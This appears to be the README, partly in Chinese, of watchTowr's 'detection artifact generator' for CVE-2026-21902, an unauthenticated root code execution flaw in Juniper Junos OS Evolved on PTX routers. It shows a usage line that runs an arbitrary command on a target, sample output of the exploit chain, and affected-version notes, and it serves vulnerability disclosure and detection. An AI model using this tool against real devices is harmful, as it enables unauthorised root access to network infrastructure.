生成针对 Juniper Junos Evolved 上 CVE-2026-21902 的检测工件,支持通过命令和 DAG 创建验证未认证的远程代码执行。
面向 Juniper Junos Evolved CVE-2026-21902 的检测产物生成器。
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
技术详情请参阅我们的博客文章。
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Juniper JunosEvolved Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] COMMAND cmd1 created
[+] DAG dag1 created
[+] DAG INSTANCE instance1 created
[+] Config committed...
[#] Waiting for command execution...
[+] Command executed, check the target for results!
此脚本用于尝试检测 Junos Evolved OS 与 PTX 系列是否受 CVE-2026-21902 影响。
此问题影响 PTX 系列上的 Junos OS Evolved:
此问题不影响早于 25.4R1-EVO 的 Junos OS Evolved 版本。
此问题不影响 Junos OS。
更多信息请阅读安全公告 Junos OS Evolved:PTX 系列:一个漏洞允许未认证的、基于网络的攻击者以 root 身份执行代码。
如需获取最新安全研究,请关注 watchTowr 实验室团队